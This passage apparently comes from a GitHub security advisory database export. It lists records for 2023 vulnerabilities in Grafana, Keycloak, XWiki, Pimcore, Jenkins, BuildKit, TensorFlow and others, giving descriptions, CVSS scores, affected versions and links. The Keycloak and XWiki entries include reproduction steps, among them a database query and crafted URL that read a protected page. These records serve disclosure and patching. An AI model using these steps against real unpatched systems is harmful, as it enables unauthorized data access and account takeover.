[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-36397'}, {'type': 'PACKAGE', 'url': 'https://github.com/moodle/moodle'}, {'type': 'WEB', 'url': 'https://moodle.org/mod/forum/discuss.php?d=424803'}]
|
{'cwe_ids': ['CWE-276'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-08T00:20:44Z', 'nvd_published_at': '2023-03-06T22:15:00Z'}
|
1.4.0
|
GHSA-hjv9-hm2f-rpcj
|
2023-03-09T04:23:52Z
|
2023-03-01T18:30:59Z
| null |
['CVE-2023-0507']
|
Grafana vulnerable to Cross-site Scripting
|
Grafana is an open-source platform for monitoring and observability. Starting with the 8.1 branch, Grafana had a stored XSS vulnerability affecting the core plugin GeoMap. The stored XSS vulnerability was possible due to map attributions weren't properly sanitized and allowed arbitrary JavaScript to be executed in the context of the currently authorized user of the Grafana instance. An attacker needs to have the Editor role in order to change a panel to include a map attribution containing JavaScript. This means that vertical privilege escalation is possible, where a user with Editor role can change to a known password for a user having Admin role if the user with Admin role executes malicious JavaScript viewing a dashboard. Users may upgrade to version 8.5.21, 9.2.13 and 9.3.8 to receive a fix.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/grafana/grafana'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.1.0'}, {'fixed': '8.5.21'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/grafana/grafana'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.2.13'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/grafana/grafana'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.3.0'}, {'fixed': '9.3.8'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0507'}, {'type': 'PACKAGE', 'url': 'https://github.com/grafana/grafana'}, {'type': 'WEB', 'url': 'https://grafana.com/security/security-advisories/cve-2023-0507/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230413-0001/'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-02T23:06:08Z', 'nvd_published_at': '2023-03-01T16:15:00Z'}
|
1.4.0
|
GHSA-9crj-hpxh-f6qg
|
2023-04-03T19:30:03Z
|
2023-03-27T21:30:25Z
| null |
['CVE-2023-0241']
|
pgAdmin 4 vulnerable to directory traversal
|
pgAdmin 4 versions prior to v6.19 contains a directory traversal vulnerability. A user of the product may change another user's settings or alter the database.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'pgadmin4'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.19'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.18'}}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0241'}, {'type': 'WEB', 'url': 'https://github.com/pgadmin-org/pgadmin4/issues/5734'}, {'type': 'WEB', 'url': 'https://github.com/akshay-joshi/pgadmin4/commit/64d7289c5b3831137b17bb4c5022ef4f63d2ef42'}, {'type': 'PACKAGE', 'url': 'https://github.com/pgadmin-org/'}, {'type': 'WEB', 'url': 'https://jvn.jp/en/jp/JVN01398015/'}]
|
{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-03T19:30:03Z', 'nvd_published_at': '2023-03-27T21:15:00Z'}
|
1.4.0
|
GHSA-6q8m-42qq-64r7
|
2023-03-02T17:16:46Z
|
2023-03-01T09:30:29Z
| null |
['CVE-2021-4326']
|
Imperative CLI vulnerable to Command Injection
|
A vulnerability in Imperative framework which allows already-privileged local actors to execute arbitrary shell commands via plugin install/update commands, or maliciously formed environment variables. Impacts Zowe CLI.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'npm', 'name': '@zowe/imperative'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.7.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@zowe/imperative'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.18.10'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-4326'}, {'type': 'WEB', 'url': 'https://github.com/zowe/imperative/pull/900'}, {'type': 'WEB', 'url': 'https://github.com/zowe/imperative/pull/902'}, {'type': 'PACKAGE', 'url': 'https://github.com/zowe/imperative/'}, {'type': 'WEB', 'url': 'https://github.com/zowe/imperative/commits/v4.18.10'}, {'type': 'WEB', 'url': 'https://github.com/zowe/imperative/commits/v5.7.1'}]
|
{'cwe_ids': ['CWE-77'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-03-01T22:57:51Z', 'nvd_published_at': '2023-03-01T08:15:00Z'}
|
1.4.0
|
GHSA-34m5-796p-mjcp
|
2023-04-10T19:59:10Z
|
2023-03-30T12:30:15Z
| null |
['CVE-2023-28935']
|
Apache UIMA DUCC allows remote code execution
|
** UNSUPPORTED WHEN ASSIGNED ** Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Apache Software Foundation Apache UIMA DUCC. When using the "Distributed UIMA Cluster Computing" (DUCC) module of Apache UIMA, an authenticated user that has the permissions to modify core entities can cause command execution as the system user that runs the web process. As the "Distributed UIMA Cluster Computing" module for UIMA is retired, we do not plan to release a fix for this issue. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.uima:uima-ducc-parent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.0.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28935'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/uima-ducc'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/r19z14b9rrfxv72r93q5trq5tyffo75g'}]
|
{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-30T21:44:38Z', 'nvd_published_at': '2023-03-30T10:15:00Z'}
|
1.4.0
|
GHSA-w354-2f3c-qvg9
|
2023-09-25T17:19:40Z
|
2023-03-01T16:18:55Z
| null |
['CVE-2022-1438']
|
Keycloak vulnerable to Cross-site Scripting
|
A flaw was found in Keycloak. Under specific circumstances, HTML entities are not sanitized during user impersonation, resulting in a Cross-site scripting (XSS) vulnerability.
## Details
This issue is the result of code found in the exception here: [https://github.com/keycloak/keycloak/blob/48835576daa158443f69917ac309e1a7c951bc87/services/src/main/java/org/keycloak/authentication/AuthenticationProcessor.java#L1045](https://github.com/keycloak/keycloak/blob/48835576daa158443f69917ac309e1a7c951bc87/services/src/main/java/org/keycloak/authentication/AuthenticationProcessor.java#L1045)
## Steps to reproduce
When using the legacy admin console:
1. Sign in as Admin user in first tab.
2. In that tab create new user in keycloak admin section > intercept user creation request and modify it by including malicious js script there (in username field).
3. Sign in as newly created user in second tab (same browser window but second tab).
4. Navigate back to first tab where you are signed in as admin, navigate to admin console which lists all application users.
5. Choose any user (except newly created malicious one) – modify anything for that user in his settings. E.g. navigate to credentials tab and set new credentials for him. Also set new password as temporary.
6. After update for that user is made, use impersonate option on that modified user.
7. You should see window with form which requires providing new credentials – fill it and submit request.
8. Just after submiting request user will get notified that “You are already authenticated as different user ‘[user + payload]’ in this session. Please sign out first.” And malicious payload will be executed instantly.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.keycloak:keycloak-services'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '21.0.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/keycloak/keycloak/security/advisories/GHSA-w354-2f3c-qvg9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-1438'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2023:1043'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2023:1044'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2023:1045'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2023:1047'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2023:1049'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/cve-2022-1438'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=2031904'}, {'type': 'PACKAGE', 'url': 'https://github.com/keycloak/keycloak'}, {'type': 'WEB', 'url': 'https://github.com/keycloak/keycloak/blob/48835576daa158443f69917ac309e1a7c951bc87/services/src/main/java/org/keycloak/authentication/AuthenticationProcessor.java#L1045'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-01T16:18:55Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-vq4h-9ghm-qmrr
|
2023-04-07T19:23:01Z
|
2023-03-30T03:30:38Z
| null |
['CVE-2023-25000']
|
HashiCorp Vault's implementation of Shamir's secret sharing vulnerable to cache-timing attacks
|
HashiCorp Vault's implementation of Shamir's secret sharing used precomputed table lookups, and was vulnerable to cache-timing attacks. An attacker with access to, and the ability to observe a large number of unseal operations on the host through a side channel may reduce the search space of a brute force effort to recover the Shamir shares. Fixed in Vault 1.13.1, 1.12.5, and 1.11.9.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.9'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.12.0'}, {'fixed': '1.12.5'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.13.0'}, {'fixed': '1.13.1'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25000'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/vault/pull/19495'}, {'type': 'WEB', 'url': 'https://discuss.hashicorp.com/t/hcsec-2023-10-vault-vulnerable-to-cache-timing-attacks-during-seal-and-unseal-operations/52078'}, {'type': 'PACKAGE', 'url': 'https://github.com/hashicorp/vault'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230526-0008/'}]
|
{'cwe_ids': ['CWE-203', 'CWE-208'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-07T19:23:01Z', 'nvd_published_at': '2023-03-30T01:15:00Z'}
|
1.4.0
|
GHSA-vpx4-7rfp-h545
|
2023-03-03T22:46:43Z
|
2023-03-03T22:46:43Z
| null |
['CVE-2023-26473']
|
Unprivileged XWiki Platform users can make arbitrary select queries using DatabaseListProperty and suggest.vm
|
### Impact
Any user with edit right can execute arbitrary database select and access data stored in the database.
To reproduce:
* In admin, rights, remove scripting rights for {{XWikiAllGroup}}.
* Create a new user without any special privileges.
* Create a page "Private.WebHome" with {{TOKEN_42}} as content. Go to "page administration" and explicitly set all rights for "Admin" to remove them for all other users.
* Logout and login as the unprivileged user. Ensure that the previously created page cannot be viewed.
* Create a new page "ExploitClass.WebHome" and then open it in the class editor (first, make the user an advanced user).
* Add a field named {{ContentList}} of type {{Database List}}
* Enter in field "Hibernate Query" the following content: {noformat}select doc.content, doc.fullName from XWikiDocument as doc where doc.fullName = 'Private.WebHome'{noformat}
* Save the class.
* Open [http://localhost:8080/xwiki/bin/view/ExploitClass/?xpage=suggest&classname=ExploitClass.WebHome&fieldname=ContentList&firCol=doc.fullName&secCol=-]
### Patches
The problem has been patched on XWiki 13.10.11, 14.4.7, and 14.10.
### Workarounds
There is no workaround for this vulnerability other than upgrading.
### References
https://jira.xwiki.org/browse/XWIKI-19523
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)
* Email us at [Security Mailing List](mailto:security@xwiki.org)
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.3-rc-1'}, {'fixed': '13.10.11'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.0'}, {'fixed': '14.4.7'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.5'}, {'fixed': '14.10'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-vpx4-7rfp-h545'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26473'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-19523'}]
|
{'cwe_ids': ['CWE-284'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-03T22:46:43Z', 'nvd_published_at': '2023-03-02T19:15:00Z'}
|
1.4.0
|
GHSA-rcg9-hrhx-6q69
|
2023-03-20T17:18:37Z
|
2023-03-20T17:18:37Z
| null |
['CVE-2023-28429']
|
Pimcore has Cross-site Scripting vulnerability in DataObject tooltip field
|
### Impact
Unsecured tooltip field in DataObject class definition.
This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie or redirect users to other malicious sites.
### Patches
Update to version 10.5.19 or apply this patch manually https://github.com/pimcore/pimcore/pull/14574.patch
### Workarounds
Apply https://github.com/pimcore/pimcore/pull/14574.patch manually.
### References
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.5.19'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/security/advisories/GHSA-rcg9-hrhx-6q69'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28429'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/pull/14574'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/pull/14574.patch'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-20T17:18:37Z', 'nvd_published_at': '2023-03-20T15:15:00Z'}
|
1.4.0
|
GHSA-8692-g6g9-gm5p
|
2023-03-03T22:52:47Z
|
2023-03-03T22:52:47Z
| null |
['CVE-2023-26478']
|
xwiki contains Exposed Dangerous Method or Function
|
### Impact
`org.xwiki.store.script.TemporaryAttachmentsScriptService#uploadTemporaryAttachment` is returning an instance of `com.xpn.xwiki.doc.XWikiAttachment`. This class is not supported to be exposed to users without the `programing` right.
`com.xpn.xwiki.api.Attachment` should be used instead and takes case of checking the user's rights before performing dangerous operations.
### Patches
This has been patched in the version 14.9-rc-1 and 14.4.6.
### Workarounds
There's no workaround for this issue.
### References
https://jira.xwiki.org/browse/XWIKI-20180
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [JIRA](https://jira.xwiki.org/)
* Email us at [security ML](mailto:security@xwiki.org)
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-store-filesystem-oldcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.3-rc-1'}, {'fixed': '14.4.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-store-filesystem-oldcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.5'}, {'fixed': '14.9-rc-1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-8692-g6g9-gm5p'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26478'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/3c73c59e39b6436b1074d8834cf276916010014d'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20180'}]
|
{'cwe_ids': ['CWE-749'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-03T22:52:47Z', 'nvd_published_at': '2023-03-02T18:15:00Z'}
|
1.4.0
|
GHSA-8jh8-33f5-cgfp
|
2023-03-13T15:33:02Z
|
2023-03-07T09:30:30Z
| null |
['CVE-2023-1243']
|
Answer vulnerable to Cross-site Scripting
|
Cross-site Scripting (XSS) - Stored in GitHub repository answerdev/answer prior to 1.0.6.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/answerdev/answer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.6'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1243'}, {'type': 'WEB', 'url': 'https://github.com/answerdev/answer/commit/9870ed87fb24ed468aaf1e169c2d028e0f375106'}, {'type': 'PACKAGE', 'url': 'https://github.com/answerdev/answer'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/1d62d35a-b096-4b76-a021-347c3f1c570c'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-08T17:03:00Z', 'nvd_published_at': '2023-03-07T08:15:00Z'}
|
1.4.0
|
GHSA-cj6r-8pxj-5jv6
|
2023-05-23T20:49:09Z
|
2023-03-10T21:30:19Z
| null |
['CVE-2023-27902']
|
Incorrect Permission Preservation in Jenkins Core
|
Jenkins uses temporary directories adjacent to workspace directories, usually with the @tmp name suffix, to store temporary files related to the build. In pipelines, these temporary directories are adjacent to the current working directory when operating in a subdirectory of the automatically allocated workspace. Jenkins-controlled processes, like SCMs, may store credentials in these directories.
Jenkins 2.393 and earlier, LTS 2.375.3 and earlier, and prior to LTS 2.387.1 shows these temporary directories when viewing job workspaces, which allows attackers with Item/Workspace permission to access their contents.
Jenkins 2.394, LTS 2.375.4, and LTS 2.387.1 does not list these temporary directories in job workspaces.
As a workaround, do not grant Item/Workspace permission to users who lack Item/Configure permission, if you’re concerned about this issue but unable to immediately update Jenkins.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.main:jenkins-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.376'}, {'fixed': '2.387.1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.main:jenkins-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.375.4'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.main:jenkins-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.388'}, {'fixed': '2.394'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27902'}, {'type': 'WEB', 'url': 'https://github.com/CVEProject/cvelist/blob/master/2023/27xxx/CVE-2023-27902.json'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-03-08/#SECURITY-1807'}]
|
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-17T14:44:16Z', 'nvd_published_at': '2023-03-10T21:15:00Z'}
|
1.4.0
|
GHSA-3223-w774-99fq
|
2023-03-22T19:54:12Z
|
2023-03-16T18:34:20Z
| null |
['CVE-2023-1429']
|
Cross-site Scripting (XSS) in Document Types
|
### Impact
Unsecured Name field in Document Types module in Settings.
This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie or redirect users to other malicious sites.
### Patches
Update to version 10.5.19 or apply this patch manually https://github.com/pimcore/pimcore/pull/14645.patch
### Workarounds
Apply https://github.com/pimcore/pimcore/pull/14645.patch manually.
### References
https://huntr.dev/bounties/e0829fea-e458-47b8-84a3-a74476d9638f/
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.5.19'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/security/advisories/GHSA-3223-w774-99fq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1429'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/7588c336edb24050656111b89d69e69cc9feb5f5'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/e0829fea-e458-47b8-84a3-a74476d9638f'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-16T18:34:20Z', 'nvd_published_at': '2023-03-16T12:15:00Z'}
|
1.4.0
|
GHSA-gc89-7gcr-jxqc
|
2023-03-07T20:09:44Z
|
2023-03-07T20:09:44Z
| null |
['CVE-2023-26054']
|
Buildkit credentials inlined to Git URLs could end up in provenance attestation
|
When the user sends a build request that contains a Git URL that contains credentials and the build creates a provenance attestation describing that build, these credentials could be visible from the provenance attestation.
Git URL can be passed in two ways:
1) Invoking build directly from a URL with credentials.
```
buildctl build --frontend dockerfile.v0 --context https://<credentials>@url/repo.git
```
Equivalent in `docker buildx` would be
```
docker buildx build https://<credentials>@url/repo.git
```
2) If the client sends additional VCS info hint parameters on builds from a local source. Usually, that would mean reading the origin URL from `.git/config` file.
Thanks to Oscar Alberto Tovar for discovering the issue.
### Impact
When a build is performed under specific conditions where credentials were passed to BuildKit they may be visible to everyone who has access to provenance attestation.
Provenance attestations and VCS info hints were added in version v0.11.0. Previous versions are not vulnerable.
In v0.10, when building directly from Git URL, the same URL could be visible in `BuildInfo` structure that is a predecessor of Provenance attestations. Previous versions are not vulnerable.
Note: [Docker Build-push Github action](https://github.com/docker/build-push-action) builds from Git URLs by default but **is not** affected by this issue even when working with private repositories because the credentials are passed [with build secrets](https://github.com/docker/build-push-action/blob/v4.0.0/src/context.ts#L203) and not with URLs.
### Patches
Bug is fixed in v0.11.4 .
### Workarounds
It is recommended to pass credentials with build secrets when building directly from Git URL as a more secure alternative than modifying the URL.
In Docker Buildx, VCS info hint can be disabled by setting `BUILDX_GIT_INFO=0`. `buildctl` does not set VCS hints based on `.git` directory, and values would need to be passed manually with `--opt`.
### References
- Inline credentials in URLs deprecated in RFC3986 https://www.rfc-editor.org/rfc/rfc3986#section-3.2.1
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/moby/buildkit'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.10.0'}, {'fixed': '0.11.4'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/moby/buildkit/security/advisories/GHSA-gc89-7gcr-jxqc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26054'}, {'type': 'WEB', 'url': 'https://github.com/moby/buildkit/commit/75123c696506bdbca1ed69906479e200f1b62604'}, {'type': 'PACKAGE', 'url': 'https://github.com/moby/buildkit'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LYZOKMMVX4SIEHPJW3SJUQGMO5YZCPHC/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XNF4OLYZRQE75EB5TW5N42FSXHBXGWFE/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZTE4ITXXPIWZEQ4HYQCB6N6GZIMWXDAI/'}, {'type': 'WEB', 'url': 'https://www.rfc-editor.org/rfc/rfc3986#section-3.2.1'}]
|
{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-07T20:09:44Z', 'nvd_published_at': '2023-03-06T19:15:00Z'}
|
1.4.0
|
GHSA-h5v2-wrhp-5v35
|
2023-03-16T21:41:07Z
|
2023-03-12T06:30:21Z
| null |
['CVE-2022-48367']
|
Access control issue in ezsystems/ezpublish-kernel
|
Access control based on object state is mishandled. This is a policy you can use in your roles to limit access to content based on specific object state values. Due to a flawed earlier update, these limitations were ineffective in releases made since February 16th 2022. They would grant access to the given content regardless of the object state. Depending on how your frontent is designed, knowing the URL to the content may or may not be required to access it. If you are using object state limitations in your roles, this issue is critical. Please apply the fix as soon as possible.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'ezsystems/ezpublish-kernel'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.5.0'}, {'fixed': '7.5.28'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/ezsystems/ezpublish-kernel/security/advisories/GHSA-5x4f-7xgq-r42x'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-48367'}, {'type': 'WEB', 'url': 'https://developers.ibexa.co/security-advisories/ibexa-sa-2022-004-ineffective-object-state-limitation-and-unauthenticated-fastly-purge'}, {'type': 'PACKAGE', 'url': 'https://github.com/ezsystems/ezpublish-kernel'}]
|
{'cwe_ids': ['CWE-862'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-03-13T20:54:16Z', 'nvd_published_at': '2023-03-12T05:15:00Z'}
|
1.4.0
|
GHSA-6x5v-cxpp-pc5x
|
2023-03-23T19:10:59Z
|
2023-03-21T06:30:17Z
| null |
['CVE-2023-1540']
|
Answer has Observable Response Discrepancy
|
Observable Response Discrepancy in GitHub repository answerdev/answer prior to 1.0.6.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/answerdev/answer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.6'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1540'}, {'type': 'WEB', 'url': 'https://github.com/answerdev/answer/commit/1de3ec27e50ba7389c9449c59e8ea3a37a908ee4'}, {'type': 'PACKAGE', 'url': 'https://github.com/answerdev/answer'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/d8d6c259-a0f2-4209-a3b0-ecbf3eb092f4'}]
|
{'cwe_ids': ['CWE-203', 'CWE-204'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-21T22:32:37Z', 'nvd_published_at': '2023-03-21T05:15:00Z'}
|
1.4.0
|
GHSA-gw97-ff7c-9v96
|
2023-03-27T22:03:05Z
|
2023-03-24T21:57:01Z
| null |
['CVE-2023-25668']
|
TensorFlow has a heap out-of-buffer read vulnerability in the QuantizeAndDequantize operation
|
### Impact
Attackers using Tensorflow can exploit the vulnerability. They can access heap memory which is not in the control of user, leading to a crash or RCE.
